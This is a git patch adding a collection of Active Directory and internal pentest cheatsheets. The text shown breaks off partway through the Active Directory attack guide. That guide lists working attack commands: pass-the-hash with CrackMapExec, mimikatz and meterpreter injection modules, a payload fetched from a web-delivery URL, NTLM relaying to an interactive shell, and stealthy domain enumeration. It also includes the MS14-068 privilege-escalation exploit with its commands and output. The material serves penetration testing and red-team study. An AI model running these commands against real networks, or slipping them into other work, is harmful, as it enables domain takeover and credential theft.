From 53dd66c6e34ee8daba08ccefb929f5f6cc88f837 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 17 Nov 2023 12:56:44 +0100 Subject: [PATCH] PATT Migration - v0.1 --- docs/README.md | 21 +- .../Active Directory Attack.md | 4501 +++++++++++++++++ docs/cloud/C.md | 1 - docs/cloud/aws/Cloud - AWS Pentest.md | 2410 +++++++++ docs/cloud/aws/todo.md | 1 + docs/cloud/azure/Cloud - Azure Pentest.md | 1230 +++++ .../{test/B.md => azure/access-and-token.md} | 0 docs/cloud/azure/azure-services.md | 0 .../cloud/{test/A.md => azure/enumeration.md} | 0 .../Cobalt Strike - Cheatsheet.md | 491 ++ .../Metasploit - Cheatsheet.md | 234 + docs/containers/Container - Docker Pentest.md | 250 + .../Container - Kubernetes Pentest.md | 67 + .../Methodology and enumeration.md | 149 + docs/methodology/Vulnerability Reports.md | 52 + docs/pentest/Bind Shell Cheatsheet.md | 95 + docs/pentest/Escape Breakout.md | 152 + docs/pentest/Hash Cracking.md | 169 + docs/pentest/Linux - Privilege Escalation.md | 832 +++ docs/pentest/MSSQL Server - Cheatsheet.md | 676 +++ docs/pentest/Miscellaneous - Tricks.md | 27 + docs/pentest/Network Discovery.md | 256 + docs/pentest/Network Pivoting Techniques.md | 503 ++ docs/pentest/Powershell - Cheatsheet.md | 333 ++ docs/pentest/Reverse Shell Cheatsheet.md | 620 +++ docs/pentest/Source Code Management.md | 133 + .../pentest/Windows - Privilege Escalation.md | 1536 ++++++ docs/redteam/HTML Smuggling.md | 43 + docs/redteam/Linux - Evasion.md | 120 + docs/redteam/Linux - Persistence.md | 237 + docs/redteam/Office - Attacks.md | 747 +++ docs/redteam/Windows - AMSI Bypass.md | 778 +++ docs/redteam/Windows - DPAPI.md | 100 + docs/redteam/Windows - Defenses.md | 421 ++ .../redteam/Windows - Download and Execute.md | 122 + docs/redteam/Windows - Mimikatz.md | 318 ++ docs/redteam/Windows - Persistence.md | 629 +++ docs/redteam/Windows - Using credentials.md | 394 ++ docs/redteam/attack-surface-enumeration.md | 203 + docs/redteam/initial-access.md | 190 + 40 files changed, 19039 insertions(+), 2 deletions(-) create mode 100644 docs/active-directory/Active Directory Attack.md delete mode 100644 docs/cloud/C.md create mode 100644 docs/cloud/aws/Cloud - AWS Pentest.md create mode 100644 docs/cloud/aws/todo.md create mode 100644 docs/cloud/azure/Cloud - Azure Pentest.md rename docs/cloud/{test/B.md => azure/access-and-token.md} (100%) create mode 100644 docs/cloud/azure/azure-services.md rename docs/cloud/{test/A.md => azure/enumeration.md} (100%) create mode 100644 docs/command-control/Cobalt Strike - Cheatsheet.md create mode 100644 docs/command-control/Metasploit - Cheatsheet.md create mode 100644 docs/containers/Container - Docker Pentest.md create mode 100644 docs/containers/Container - Kubernetes Pentest.md create mode 100644 docs/methodology/Methodology and enumeration.md create mode 100644 docs/methodology/Vulnerability Reports.md create mode 100644 docs/pentest/Bind Shell Cheatsheet.md create mode 100644 docs/pentest/Escape Breakout.md create mode 100644 docs/pentest/Hash Cracking.md create mode 100644 docs/pentest/Linux - Privilege Escalation.md create mode 100644 docs/pentest/MSSQL Server - Cheatsheet.md create mode 100644 docs/pentest/Miscellaneous - Tricks.md create mode 100644 docs/pentest/Network Discovery.md create mode 100644 docs/pentest/Network Pivoting Techniques.md create mode 100644 docs/pentest/Powershell - Cheatsheet.md create mode 100644 docs/pentest/Reverse Shell Cheatsheet.md create mode 100644 docs/pentest/Source Code Management.md create mode 100644 docs/pentest/Windows - Privilege Escalation.md create mode 100644 docs/redteam/HTML Smuggling.md create mode 100644 docs/redteam/Linux - Evasion.md create mode 100644 docs/redteam/Linux - Persistence.md create mode 100644 docs/redteam/Office - Attacks.md create mode 100644 docs/redteam/Windows - AMSI Bypass.md create mode 100644 docs/redteam/Windows - DPAPI.md create mode 100644 docs/redteam/Windows - Defenses.md create mode 100644 docs/redteam/Windows - Download and Execute.md create mode 100644 docs/redteam/Windows - Mimikatz.md create mode 100644 docs/redteam/Windows - Persistence.md create mode 100644 docs/redteam/Windows - Using credentials.md create mode 100644 docs/redteam/attack-surface-enumeration.md create mode 100644 docs/redteam/initial-access.md diff --git a/docs/README.md b/docs/README.md index dd6974f..0176c2e 100644 --- a/docs/README.md +++ b/docs/README.md @@ -1 +1,20 @@ -# Welcome \ No newline at end of file +# InternalAllTheThings + +Active Directory and Internal Pentest Cheatsheets + + +

+ +

+ + +📖 Documentation +----- + +TODO + + +👨‍💻 Contributions +----- + +TODO \ No newline at end of file diff --git a/docs/active-directory/Active Directory Attack.md b/docs/active-directory/Active Directory Attack.md new file mode 100644 index 0000000..a9b5d5b --- /dev/null +++ b/docs/active-directory/Active Directory Attack.md @@ -0,0 +1,4501 @@ +# Active Directory Attacks + +## Summary + +- [Active Directory Attacks](#active-directory-attacks) + - [Summary](#summary) + - [Tools](#tools) + - [Kerberos Clock Synchronization](#kerberos-clock-synchronization) + - [Active Directory Recon](#active-directory-recon) + - [Using BloodHound](#using-bloodhound) + - [Using PowerView](#using-powerview) + - [Using AD Module](#using-ad-module) + - [From CVE to SYSTEM shell on DC](#from-cve-to-system-shell-on-dc) + - [MS14-068 Checksum Validation](#ms14-068-checksum-validation) + - [ZeroLogon](#zerologon) + - [PrintNightmare](#printnightmare) + - [samAccountName spoofing](#samaccountname-spoofing) + - [Open Shares](#open-shares) + - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share) + - [SCF Files](#scf-files) + - [URL Files](#url-files) + - [Windows Library Files](#windows-library-files) + - [Windows Search Connectors Files](#windows-search-connectors-files) + - [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences) + - [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo) + - [Find vulnerable GPO](#find-vulnerable-gpo) + - [Abuse GPO with SharpGPOAbuse](#abuse-gpo-with-sharpgpoabuse) + - [Abuse GPO with PowerGPOAbuse](#abuse-gpo-with-powergpoabuse) + - [Abuse GPO with pyGPOAbuse](#abuse-gpo-with-pygpoabuse) + - [Abuse GPO with PowerView](#abuse-gpo-with-powerview) + - [Abuse GPO with StandIn](#abuse-gpo-with-standin) + - [Dumping AD Domain Credentials](#dumping-ad-domain-credentials) + - [DCSync Attack](#dcsync-attack) + - [Volume Shadow Copy](#volume-shadow-copy) + - [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit) + - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa) + - [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat) + - [NTDS Reversible Encryption](#ntds-reversible-encryption) + - [User Hunting](#user-hunting) + - [Password spraying](#password-spraying) + - [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing) + - [Spray a pre-generated passwords list](#spray-a-pre-generated-passwords-list) + - [Spray passwords against the RDP service](#spray-passwords-against-the-rdp-service) + - [BadPwdCount attribute](#badpwdcount-attribute) + - [Password in AD User comment](#password-in-ad-user-comment) + - [Password of Pre-Created Computer Account](#password-of-pre-created-computer-account) + - [Reading LAPS Password](#reading-laps-password) + - [Reading GMSA Password](#reading-gmsa-password) + - [Forging Golden GMSA](#forging-golden-gmsa) + - [Kerberos Tickets](#kerberos-tickets) + - [Dump Kerberos Tickets](#dump-kerberos-tickets) + - [Replay Kerberos Tickets](#replay-kerberos-tickets) + - [Convert Kerberos Tickets](#convert-kerberos-tickets) + - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) + - [Using Mimikatz](#using-mimikatz) + - [Using Meterpreter](#using-meterpreter) + - [Using a ticket on Linux](#using-a-ticket-on-linux) + - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) + - [Pass-the-Ticket Diamond Tickets](#pass-the-ticket-diamond-tickets) + - [Pass-the-Ticket Sapphire Tickets](#pass-the-ticket-sapphire-tickets) + - [Kerberoasting](#kerberoasting) + - [KRB_AS_REP Roasting](#krb_as_rep-roasting) + - [Kerberoasting w/o domain account](#kerberoasting-wo-domain-account) + - [CVE-2022-33679](#cve-2022-33679) + - [Timeroasting](#timeroasting) + - [Pass-the-Hash](#pass-the-hash) + - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) + - [Using impacket](#using-impacket) + - [Using Rubeus](#using-rubeus) + - [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes) + - [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes) + - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying) + - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) + - [LDAP signing not required and LDAP channel binding disabled](#ldap-signing-not-required-and-ldap-channel-binding-disabled) + - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4) + - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6) + - [Drop the MIC](#drop-the-mic) + - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) + - [RemotePotato0 DCOM DCE RPC relay](#remotepotato0-dcom-dce-rpc-relay) + - [DNS Poisonning - Relay delegation with mitm6](#dns-poisonning---relay-delegation-with-mitm6) + - [Relaying with WebDav Trick](#relaying-with-webdav-trick) + - [Active Directory Certificate Services](#active-directory-certificate-services) + - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates) + - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates) + - [ESC3 - Misconfigured Enrollment Agent Templates](#esc3---misconfigured-enrollment-agent-templates) + - [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities) + - [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2) + - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control) + - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) + - [ESC9 - No Security Extension](#esc9---no-security-extension) + - [ESC11 - Relaying NTLM to ICPR](#esc11---relaying-ntlm-to-icpr) + - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) + - [Pass-The-Certificate](#pass-the-certificate) + - [UnPAC The Hash](#unpac-the-hash) + - [Shadow Credentials](#shadow-credentials) + - [Active Directory Groups](#active-directory-groups) + - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) + - [Abusing DNS Admins Group](#abusing-dns-admins-group) + - [Abusing Schema Admins Group](#abusing-schema-admins-group) + - [Abusing Backup Operators Group](#abusing-backup-operators-group) + - [Active Directory Federation Services](#active-directory-federation-services) + - [ADFS - Golden SAML](#adfs---golden-saml) + - [Active Directory Integrated DNS](#active-directory-integrated-dns) + - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) + - [GenericAll](#genericall) + - [GenericWrite](#genericwrite) + - [GenericWrite and Remote Connection Manager](#genericwrite-and-remote-connection-manager) + - [WriteDACL](#writedacl) + - [WriteOwner](#writeowner) + - [ReadLAPSPassword](#readlapspassword) + - [ReadGMSAPassword](#readgmsapassword) + - [ForceChangePassword](#forcechangepassword) + - [DCOM Exploitation](#dcom-exploitation) + - [DCOM via MMC Application Class](#dcom-via-mmc-application-class) + - [DCOM via Excel](#dcom-via-excel) + - [DCOM via ShellExecute](#dcom-via-shellexecute) + - [Trust relationship between domains](#trust-relationship-between-domains) + - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) + - [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket) + - [Privileged Access Management (PAM) Trust](#privileged-access-management-pam-trust) + - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation) + - [SpoolService Abuse with Unconstrained Delegation](#spoolservice-abuse-with-unconstrained-delegation) + - [MS-EFSRPC Abuse with Unconstrained Delegation](#ms---efsrpc-abuse-with-unconstrained-delegation) + - [Kerberos Constrained Delegation](#kerberos-constrained-delegation) + - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation) + - [Kerberos Service for User Extension](#kerberos-service-for-user-extension) + - [S4U2self - Privilege Escalation](#s4u2self---privilege-escalation) + - [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049) + - [PrivExchange attack](#privexchange-attack) + - [SCCM Deployment](#sccm-deployment) + - [SCCM Network Access Accounts](#sccm-network-access-accounts) + - [SCCM Shares](#sccm-shares) + - [WSUS Deployment](#wsus-deployment) + - [RODC - Read Only Domain Controller](#rodc---read-only-domain-controller) + - [RODC Golden Ticket](#rodc-golden-ticket) + - [RODC Key List Attack](#rodc-key-list-attack) + - [RODC Computer Object](#rodc-computer-object) + - [PXE Boot image attack](#pxe-boot-image-attack) + - [DSRM Credentials](#dsrm-credentials) + - [DNS Reconnaissance](#dns-reconnaissance) + - [Linux Active Directory](#linux-active-directory) + - [CCACHE ticket reuse from /tmp](#ccache-ticket-reuse-from-tmp) + - [CCACHE ticket reuse from keyring](#ccache-ticket-reuse-from-keyring) + - [CCACHE ticket reuse from SSSD KCM](#ccache-ticket-reuse-from-sssd-kcm) + - [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab) + - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab) + - [Extract accounts from /etc/sssd/sssd.conf](#extract-accounts-from-etcsssdsssdconf) + - [References](#references) + +## Tools + +* [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows) +* [Responder](https://github.com/lgandx/Responder) +* [InveighZero](https://github.com/Kevin-Robertson/InveighZero) +* [Mimikatz](https://github.com/gentilkiwi/mimikatz) +* [Ranger](https://github.com/funkandwagnalls/ranger) +* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) +* [CrackMapExec](https://github.com/mpgn/CrackMapExec) + + ```powershell + # use the latest release, CME is now a binary packaged will all its dependencies + root@payload$ wget https://github.com/mpgn/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip + + # execute cme (smb, winrm, mssql, ...) + root@payload$ cme smb -L + root@payload$ cme smb -M name_module -o VAR=DATA + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares + root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' + root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz + root@payload$ cme mimikatz --server http --server-port 80 + ``` + +* [Mitm6](https://github.com/fox-it/mitm6.git) + + ```bash + git clone https://github.com/fox-it/mitm6.git && cd mitm6 + pip install . + mitm6 -d lab.local + ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i + # -wh: Server hosting WPAD file (Attacker’s IP) + # -t: Target (You cannot relay credentials to the same device that you’re spoofing) + # -i: open an interactive shell + ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access + ``` + +* [ADRecon](https://github.com/sense-of-security/ADRecon) + + ```powershell + .\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser + ``` + +* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) + + ```powershell + powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1 + ``` + +* [Ping Castle](https://github.com/vletoux/pingcastle) + + ```powershell + pingcastle.exe --healthcheck --server --user --password --advanced-live --nullsession + pingcastle.exe --healthcheck --server domain.local + pingcastle.exe --graph --server domain.local + pingcastle.exe --scanner scanner_name --server domain.local + available scanners are:aclcheck,antivirus,computerversion,foreignusers,laps_bitlocker,localadmin,nullsession,nullsession-trust,oxidbindings,remote,share,smb,smb3querynetwork,spooler,startup,zerologon,computers,users + ``` + +* [Kerbrute](https://github.com/ropnop/kerbrute) + + ```powershell + ./kerbrute passwordspray -d + ``` + +* [Rubeus](https://github.com/GhostPack/Rubeus) + + ```powershell + Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ptt] [/luid] + Rubeus.exe dump [/service:SERVICE] [/luid:LOGINID] + Rubeus.exe klist [/luid:LOGINID] + Rubeus.exe kerberoast [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] + ``` + +* [AutomatedLab](https://github.com/AutomatedLab/AutomatedLab) + ```powershell + New-LabDefinition -Name GettingStarted -DefaultVirtualizationEngine HyperV + Add-LabMachineDefinition -Name FirstServer -OperatingSystem 'Windows Server 2016 SERVERSTANDARD' + Install-Lab + Show-LabDeploymentSummary + ``` + + +## Kerberos Clock Synchronization + +In Kerberos, time is used to ensure that tickets are valid. To achieve this, the clocks of all Kerberos clients and servers in a realm must be synchronized to within a certain tolerance. The default clock skew tolerance in Kerberos is `5 minutes`, which means that the difference in time between the clocks of any two Kerberos entities should be no more than 5 minutes. + + +* Detect clock skew automatically with `nmap` + ```powershell + $ nmap -sV -sC 10.10.10.10 + clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s + ``` +* Compute yourself the difference between the clocks + ```ps1 + nmap -sT 10.10.10.10 -p445 --script smb2-time -vv + ``` +* Fix #1: Modify your clock + ```ps1 + sudo date -s "14 APR 2015 18:25:16" # Linux + net time /domain /set # Windows + ``` +* Fix #2: Fake your clock + ```ps1 + faketime -f '+8h' date + ``` + + +## Active Directory Recon + +### Using BloodHound + +Use the correct collector +* AzureHound for Azure Active Directory +* SharpHound for local Active Directory +* RustHound for local Active Directory + +* use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools)) + +* use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound) + ```powershell + # run the collector on the machine using SharpHound.exe + # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe + # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe + .\SharpHound.exe -c all -d active.htb --searchforest + .\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default + .\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy) + + .\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder + .\SharpHound.exe -c all --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 -d active.htb + .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 + + # or run the collector on the machine using Powershell + # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 + # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 + Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public + Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory + + # or remotely via BloodHound Python + # https://github.com/fox-it/BloodHound.py + pip install bloodhound + bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all + + # or locally/remotely from an ADExplorer snapshot from SysInternals (ADExplorer remains a legitimate binary signed by Microsoft, avoiding detection with security solutions) + # https://github.com/c3c/ADExplorerSnapshot.py + pip3 install --user . + ADExplorerSnapshot.py -o <*.json output folder path> + ``` +* Collect more data for certificates exploitation using Certipy + ```ps1 + certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound + certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound + certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -username user@domain -password Password123 + ``` +* use [OPENCYBER-FR/RustHound](https://github.com/OPENCYBER-FR/RustHound) + ```ps1 + # Windows with GSSAPI session + rusthound.exe -d domain.local --ldapfqdn domain + # Windows/Linux simple bind connection username:password + rusthound.exe -d domain.local -u user@domain.local -p Password123 -o output -z + # Linux with username:password and ADCS module for @ly4k BloodHound version + rusthound -d domain.local -u 'user@domain.local' -p 'Password123' -o /tmp/adcs --adcs -z + ``` + +Then import the zip/json files into the Neo4J database and query them. + +```powershell +root@payload$ apt install bloodhound + +# start BloodHound and the database +root@payload$ neo4j console +# or use docker +root@payload$ docker run -itd -p 7687:7687 -p 7474:7474 --env NEO4J_AUTH=neo4j/bloodhound -v $(pwd)/neo4j:/data neo4j:4.4-community + +root@payload$ ./bloodhound --no-sandbox +Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j +``` + +You can add some custom queries like : +* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) +* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json) +* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json) +* [Certipy BloodHound Custom Queries from ly4k](https://github.com/ly4k/Certipy/blob/main/customqueries.json) + +Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`. + + +### Using PowerView + +- **Get Current Domain:** `Get-NetDomain` +- **Enum Other Domains:** `Get-NetDomain -Domain ` +- **Get Domain SID:** `Get-DomainSID` +- **Get Domain Policy:** + ```powershell + Get-DomainPolicy + + #Will show us the policy configurations of the Domain about system access or kerberos + (Get-DomainPolicy)."system access" + (Get-DomainPolicy)."kerberos policy" + ``` +- **Get Domain Controlers:** + ```powershell + Get-NetDomainController + Get-NetDomainController -Domain + ``` +- **Enumerate Domain Users:** + ```powershell + Get-NetUser + Get-NetUser -SamAccountName + Get-NetUser | select cn + Get-UserProperty + + #Check last password change + Get-UserProperty -Properties pwdlastset + + #Get a specific "string" on a user's attribute + Find-UserField -SearchField Description -SearchTerm "wtver" + + #Enumerate user logged on a machine + Get-NetLoggedon -ComputerName + + #Enumerate Session Information for a machine + Get-NetSession -ComputerName + + #Enumerate domain machines of the current/specified domain where specific users are logged into + Find-DomainUserLocation -Domain | Select-Object UserName, SessionFromName + ``` +- **Enum Domain Computers:** + ```powershell + Get-NetComputer -FullData + Get-DomainGroup + + #Enumerate Live machines + Get-NetComputer -Ping + ``` +- **Enum Groups and Group Members:** + ```powershell + Get-NetGroupMember -GroupName "" -Domain + + #Enumerate the members of a specified group of the domain + Get-DomainGroup -Identity | Select-Object -ExpandProperty Member + + #Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences + Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName + ``` +- **Enumerate Shares** + ```powershell + #Enumerate Domain Shares + Find-DomainShare + + #Enumerate Domain Shares the current user has access + Find-DomainShare -CheckShareAccess + ``` +- **Enum Group Policies:** + ```powershell + Get-NetGPO + + # Shows active Policy on specified machine + Get-NetGPO -ComputerName + Get-NetGPOGroup + + #Get users that are part of a Machine's local Admin group + Find-GPOComputerAdmin -ComputerName + ``` +- **Enum OUs:** + ```powershell + Get-NetOU -FullData + Get-NetGPO -GPOname + ``` +- **Enum ACLs:** + ```powershell + # Returns the ACLs associated with the specified account + Get-ObjectAcl -SamAccountName -ResolveGUIDs + Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose + + #Search for interesting ACEs + Invoke-ACLScanner -ResolveGUIDs + + #Check the ACLs associated with a specified path (e.g smb share) + Get-PathAcl -Path "\\Path\Of\A\Share" + ``` +- **Enum Domain Trust:** + ```powershell + Get-NetDomainTrust + Get-NetDomainTrust -Domain + ``` +- **Enum Forest Trust:** + ```powershell + Get-NetForestDomain + Get-NetForestDomain Forest + + #Domains of Forest Enumeration + Get-NetForestDomain + Get-NetForestDomain Forest + + #Map the Trust of the Forest + Get-NetForestTrust + Get-NetDomainTrust -Forest + ``` +- **User Hunting:** + ```powershell + #Finds all machines on the current domain where the current user has local admin access + Find-LocalAdminAccess -Verbose + + #Find local admins on all machines of the domain: + Invoke-EnumerateLocalAdmin -Verbose + + #Find computers were a Domain Admin OR a specified user has a session + Invoke-UserHunter + Invoke-UserHunter -GroupName "RDPUsers" + Invoke-UserHunter -Stealth + + #Confirming admin access: + Invoke-UserHunter -CheckAccess + ``` + :heavy_exclamation_mark: **Priv Esc to Domain Admin with User Hunting:** \ + I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> + Profit! + + [PowerView 3.0 Tricks](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) + +### Using AD Module + +- **Get Current Domain:** `Get-ADDomain` +- **Enum Other Domains:** `Get-ADDomain -Identity ` +- **Get Domain SID:** `Get-DomainSID` +- **Get Domain Controlers:** + + ```powershell + Get-ADDomainController + Get-ADDomainController -Identity + ``` + +- **Enumerate Domain Users:** + ```powershell + Get-ADUser -Filter * -Identity -Properties * + + #Get a specific "string" on a user's attribute + Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description + ``` +- **Enum Domain Computers:** + ```powershell + Get-ADComputer -Filter * -Properties * + Get-ADGroup -Filter * + ``` +- **Enum Domain Trust:** + ```powershell + Get-ADTrust -Filter * + Get-ADTrust -Identity + ``` +- **Enum Forest Trust:** + ```powershell + Get-ADForest + Get-ADForest -Identity + + #Domains of Forest Enumeration + (Get-ADForest).Domains + ``` + - **Enum Local AppLocker Effective Policy:** + ```powershell + Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections + ``` + +### Other Interesting Commands + +- **Find Domain Controllers** + ```ps1 + nslookup domain.com + nslookup -type=srv _ldap._tcp.dc._msdcs..com + nltest /dclist:domain.com + Get-ADDomainController -filter * | Select-Object name + gpresult /r + $Env:LOGONSERVER + echo %LOGONSERVER% + ``` + + +## From CVE to SYSTEM shell on DC + +> Sometimes you will find a Domain Controller without the latest patches installed, use the newest CVE to gain a SYSTEM shell on it. If you have a "normal user" shell on the DC you can also try to elevate your privileges using one of the methods listed in [Windows - Privilege Escalation](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) + + +### MS14-068 Checksum Validation + +This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine. + +* RPCClient + ```powershell + rpcclient $> lookupnames john.smith + john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1) + ``` +* WMI + ```powershell + wmic useraccount get name,sid + Administrator S-1-5-21-3415849876-833628785-5197346142-500 + Guest S-1-5-21-3415849876-833628785-5197346142-501 + Administrator S-1-5-21-297520375-2634728305-5197346142-500 + Guest S-1-5-21-297520375-2634728305-5197346142-501 + krbtgt S-1-5-21-297520375-2634728305-5197346142-502 + lambda S-1-5-21-297520375-2634728305-5197346142-1110 + ``` +* Powerview + ```powershell + Convert-NameToSid high-sec-corp.localkrbtgt + S-1-5-21-2941561648-383941485-1389968811-502 + ``` +* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid` + +```bash +Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 +``` + +Generate a ticket with `metasploit` or `pykek` + +```powershell +Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum + Name Current Setting Required Description + ---- --------------- -------- ----------- + DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL + PASSWORD P@ssw0rd yes The Domain User password + RHOSTS 10.10.10.10 yes The target address range or CIDR identifier + RPORT 88 yes The target port + Timeout 10 yes The TCP timeout to establish connection and read data + USER lambda yes The Domain User + USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000 +``` + +```powershell +# Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek +$ git clone https://github.com/SecWiki/windows-kernel-exploits +$ python ./ms14-068.py -u @ -s -d -p +$ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org +$ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10 +$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066 +-1105 + [+] Building AS-REQ for msfdc01.metasploitable.local... Done! + [+] Sending AS-REQ to msfdc01.metasploitable.local... Done! + [+] Receiving AS-REP from msfdc01.metasploitable.local... Done! + [+] Parsing AS-REP from msfdc01.metasploitable.local... Done! + [+] Building TGS-REQ for msfdc01.metasploitable.local... Done! + [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done! + [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done! + [+] Parsing TGS-REP from msfdc01.metasploitable.local... 